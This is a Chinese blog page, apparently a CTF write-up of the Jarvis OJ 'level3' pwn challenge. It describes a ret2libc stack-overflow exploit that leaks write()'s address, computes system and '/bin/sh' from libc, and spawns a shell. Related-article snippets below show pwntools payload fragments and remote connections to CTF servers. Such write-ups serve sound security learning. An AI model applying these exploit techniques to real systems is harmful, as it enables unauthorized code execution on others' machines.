Jarvis OJ--level3

最新推荐文章于 2021-12-05 22:48:23 发布
最新推荐文章于 2021-12-05 22:48:23 发布
阅读量298 收藏
点赞数 1
CC 4.0 BY-SA版权
分类专栏: # pwn 文章标签: 简单rop
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43092232/article/details/102997669
本文介绍了通过 Jarvis OJ 的 level3 问题,利用 ROP(Return-Oriented Programming)技术来绕过NX保护。首先,通过read()溢出构造ROP链,找到write()函数真实地址。接着,根据libc-2.19.so的相对地址,计算system和"/bin/sh"的地址。然后,使用write()再次溢出,执行system,最终获得shell。详细步骤包括泄露write()的运行时地址,计算libc的偏移,并利用延迟绑定机制完成目标函数地址的获取。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

要点:通过read()的溢出构造rop链,获得write()函数的真实地址,再利用libc的偏移算出system和“/bin/sh”的地址,再次利用write()溢出,执行system,就能得到shell。
level3.rar.2047525b05c499c9dd189ba212bba1f8
首先查看一下开启了哪些保护:
在这里插入图片描述
开启了NX,栈上不能执行shellcode。
然后用IDA查看一下代码:
main:

.text:08048484 ; =============== S U B R O U T I N E =======================================
.text:08048484
.text:08048484 ; Attributes: bp-based frame
.text:08048484
.text:08048484 ; int __cdecl main(int argc, const char **argv, const char **envp)
.text:08048484                 public main
.text:08048484 main            proc near               ; DATA XREF: _start+17↑o
.text:08048484
.text:08048484 var_4           = dword ptr -4
.text:08048484 argc            = dword ptr  8
.text:08048484 argv            = dword ptr  0Ch
.text:08048484 envp            = dword ptr  10h
.text:08048484
.text:08048484 ; __unwind {
   
   
.text:08048484                 lea     ecx, [esp+4]
.text:08048488                 and     esp, 0FFFFFFF0h
.text:0804848B                 push    dword ptr [ecx-4]
.text:0804848E                 push    ebp
.text:0804848F
最低0.47元/天 解锁文章

200万优质内容无限畅学
BUUCTF:jarvisoj_level3_x64(write up)
qq_44768749的博客
08-24 1030
BUUCTF:jarvisoj_level3_x640x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 64位程序,仅开启栈不可执行保护 0x02 运行 输入一个字符串 0x03 IDA 字符串可输入长度可造成栈溢出 0x04 思路 没有提供system函数和"/bin/sh"的地址 第一次栈溢出泄露read函数地址来得到libc版本,从而获取system函数和"/bin/sh"的地址,并且返回主函数 这里有个难点就是参数需要放到对应
Jarvis OJ --level4
Kni9hT's Blog
11-11 313
level4与level1、2、3的区别在于:无system、无"/bin/sh"、无libc 要点:使用DynELF函数leak system函数真实地址,然后用read函数写"/bin/sh\x00"到bss段,然后调用system("/bin/sh")去getshell。 题目链接: level4.0f9cfa0b7bb6c0f9e030a5541b46e9f0 先查看开了哪些保护: 和l...
jarvis oj level3
CNXBDSa的博客
07-27 457
首先先了解一下libc库的知识详情请移步大佬总结 了解一下plt和got表详情请移步大佬总结 然后是做题过程首先老规矩在ubuntu中checksec+文件名查看有无什么保护机制和位数 Arch:说明这个文件的属性是什么,说明是32位的程序。 Stack:canary,这个主要是说栈保护的东西,所利用的东西就是相当于网站的cookie,linux中把这种cookie信息称为cana...
Jarvis oj level3
发蝴蝶和大脑斧的博客
12-04 1219
下载下来发现有level3文件和libc.so文件,先checksec,和level2差不多,接着ida打开level3,没找到system函数和bin字符串,没什么办法了。接着去看so文件,libc是Linux下的ANSI C的函数库。找到了system函数和bin字符串。那么怎么利用呢? 首先了解plt和got表。链接 我是这么理解的:plt表中存放的是函数在got表中该项的地址,got表存放...
jarvisoj level3
sun的博客
10-03 1104
level3 将文件下载下来使用linux下的checksec进行检查开启了什么安全机制 sun@ubuntu:~/Desktop/test$ checksec level3 [*] '/home/sun/Desktop/test/level3' Arch: i386-32-little RELRO: Partial RELRO Stack: No c...
jarvisoj_level3
m0_52231248的博客
11-17 706
jarvisoj_level3 Checksec: Ida: 标准的ret2libc,offest=0x88+4 有write和read的plt地址 Exp: from pwn import* from LibcSearcher import* r=remote("node4.buuoj.cn",26088) elf=ELF('./level3') context.log_level = 'debug' payload=flat('a'*0x88+'bbbb') payload+=
BUUCTF---jarvisoj_level4
qq_33010875的博客
09-26 382
环境:WSL2,ubuntu16.04,python2 checksec文件: 将文件拖入ida 溢出点: 和level3不同的是 read函数之前没有调用write函数,因此要泄露libc的基地址需要用read函数,利用write函数将read函数在got表中的地址泄露出来 payload = (0x88+0x04)*'a'+p32(write_plt)+p32(main_addr)+p(1)+p32(read_got)+p(4) 接受泄露出来的地址 read_addr = u32(io.recv(
Jarvis OJ --Smashes (SSP leak攻击)
Kni9hT's Blog
11-03 836
1
pwn学习-jarvisoj-level4-无libc的漏洞利用
qq_45653588的博客
12-20 353
这题下载文件下来,文件与level3反编译后伪代码基本一样,只是相比level3少了一个libc文件。level3 vulnerable_function()中存在明显的栈溢出,分配了0x88的空间,能输入0x100的内容。 ssize_t vulnerable_function() { char buf; // [esp+0h] [ebp-88h] return read(0, &buf, 0x100u); } 同样以payload payload = 'a' * 0x8c + p32
[BUUCTF]PWN——jarvisoj_level3
BangSen1的博客
03-16 1399
jarvisoj_level3 32位,NX保护。 运行程序。 用IDA打开,shift+f12检索 ,找到关键函数。 参数buf溢出漏洞,利用ret2libc获取shell。 1,利用write函数泄露libc版本 write_plt=elf.plt['write'] write_got=elf.got['write'] payload='a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4) r.recvuntil('
Jarvis Oj Pwn 学习笔记-level3
baoan4763的博客
05-31 205
你们期待的Libc终于来了~(return_to_libc attack) 跪呈链接: https://files.cnblogs.com/files/Magpie/level3.rar nc pwn2.jarvisoj.com 9879 checksec,依旧老样子: 端起IDA,elf和libc双双扔进锅里: 先看elf: 阔以阔以,libc类题目该有的函数(话...
Jarvis OJ_level3_入门栈溢出
Jc
07-11 467
附录:发现这个网站的题还是挺系统的,对于入门pwn的是挺好的一个选择 解题思路 1. 查看文件信息,安全机制 2. 代码审计 3. 分析漏洞点 4. 编写EXP
Jarvis OJ-level3
weixin_30332241的博客
05-15 130
使用ret2libc攻击方法绕过数据执行保护 from pwn import* conn = remote("pwn2.jarvisoj.com",9879) elf = ELF('level3') libc = ELF('libc-2.19.so') plt_write = elf.symbols['write'] #0804834 print 'plt_write =...
铁人三项_第五赛区_2018_rop
z1r0的博客
12-05 210
铁人三项_第五赛区_2018_rop 查看保护 溢出,ret2libc from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27080) else: r = process(file_name) elf = ELF(file_name) def dbg(
jarvis oj level3_x64
发蝴蝶和大脑斧的博客
12-07 874
level3_x64里没有找到system函数,但给了libc.so文件,应该是和level3一样的想法。 先找到操作寄存器的地址,因为write需要3个参数,所以需要rdi,rsi,rdx。但我们搜索只找到了rdi和rsi。 0x00000000004006b3 : pop rdi ; ret 0x00000000004006b1 : pop rsi ; pop r15 ; ret 根据网上w...
Jarvis OJ [XMAN]level3 [XMAN]level3
九层台
07-07 1504
查询保护 liu@liu-F117-F:~/桌面/oj/level3$ checksec level3 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level3/level3' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found ...
[BUU-WP]jarvisoj_level3
m0sway的博客
11-22 845
jarvisoj_level3 使用checksec查看: 只开启了栈不可执行,估计又是一道栈溢出的题目,直接放进IDA中看吧: 主函数中直接给了漏洞函数,跟进去查看: read()函数可以向buf变量中写入0x100而buf距离ebp只有0x88,存在栈溢出 但这道题没有system和/bin/sh,一道标准的ret2libc 用write函数泄露libc地址,找system和/bin/sh exp: from pwn import * #start r = remote("node4.buuo
jarvis oj level3
weixin_44932880的博客
07-25 322
所需知识 先在终端用file命令查看文件为32位,在对应版本的IDA中打开 用checksec命令查看文件发现 栈无保护,再看伪代码分析可知 可以在传入buf 时覆盖栈的函数返回地址,即可以返回system函数的地址 再给system传入参数"/bin/sh" 就可以进入服务器的终端得到flag 大致思路跟第二题是一样的, 但是不同点在于上一题可以直接在IDA里面获得函数syste...
(Jarvis Oj)(Pwn) level3
Nothing
04-24 1707
(Jarvis Oj)(Pwn) level3 首先用checksec查看一下保护。 依然开启了NX保护。ida反汇编,找到溢出点。 可是呢,这次在程序中并没有找到system函数,和”/bin/sh”字符串,那么这次该如何拿到shell呢,还是利用system函数,但是没有程序中system的plt,我们如何获取system的地址呢,这需要利用到在libc.so文件中各个函数的相对...
jarvisoj_level0
08-14
- *3* [jarvis oj---level0解题方法](https://blog.csdn.net/weixin_45427676/article/details/97272924)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值